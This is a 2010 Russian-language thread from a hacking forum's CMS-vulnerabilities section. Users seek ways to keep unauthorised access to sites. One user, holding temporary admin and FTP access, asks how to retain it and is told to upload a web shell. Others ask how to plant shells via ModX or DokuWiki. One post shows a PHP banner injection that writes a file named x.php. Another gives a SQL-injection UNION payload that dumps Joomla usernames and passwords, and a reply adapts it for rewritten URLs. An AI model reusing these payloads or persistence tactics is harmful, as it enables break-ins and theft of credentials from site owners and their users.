ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.01.2010, 20:30
Аватар для globalDJs
globalDJs
Новичок
Регистрация: 05.04.2009
Сообщений: 1
Провел на форуме:
4712

Репутация: 0
По умолчанию

Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.
 
Ответить с цитированием

  #2  
Старый 22.01.2010, 12:51
Аватар для wkar
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Залей шелл.

Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.

Последний раз редактировалось wkar; 22.01.2010 в 17:50..
 
Ответить с цитированием

  #3  
Старый 31.01.2010, 20:33
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

//сцк,снова 2 символа
про хеши - читай:
Цитата:
http://forum.antichat.ru/thread155032.html
 
Ответить с цитированием

  #4  
Старый 19.02.2010, 21:51
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.

Спасибо!
 
Ответить с цитированием

  #5  
Старый 23.02.2010, 01:00
Аватар для cj69
cj69
Новичок
Регистрация: 18.02.2010
Сообщений: 5
Провел на форуме:
7718

Репутация: 0
По умолчанию

Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html

вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?
 
Ответить с цитированием

  #6  
Старый 25.02.2010, 00:24
Аватар для cryostat13
cryostat13
Новичок
Регистрация: 14.02.2010
Сообщений: 1
Провел на форуме:
10749

Репутация: 0
По умолчанию

Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];
 
Ответить с цитированием

  #7  
Старый 18.04.2010, 16:54
Аватар для GC0mmander
GC0mmander
Новичок
Регистрация: 27.12.2009
Сообщений: 8
Провел на форуме:
9139

Репутация: 0
По умолчанию

Есть ли какой-нибудь способ заливки шелла через DokuWiki?
 
Ответить с цитированием

  #8  
Старый 22.04.2010, 11:46
Аватар для mr.celt
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.
 
Ответить с цитированием

  #9  
Старый 08.05.2010, 22:44
Аватар для iSlava
iSlava
Познающий
Регистрация: 24.08.2009
Сообщений: 67
Провел на форуме:
137206

Репутация: 10
По умолчанию

у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
 
Ответить с цитированием

  #10  
Старый 10.05.2010, 18:24
Аватар для mr.celt
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от iSlava  
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Форумы 316 08.06.2010 09:56
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP, PERL, MySQL, JavaScript 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ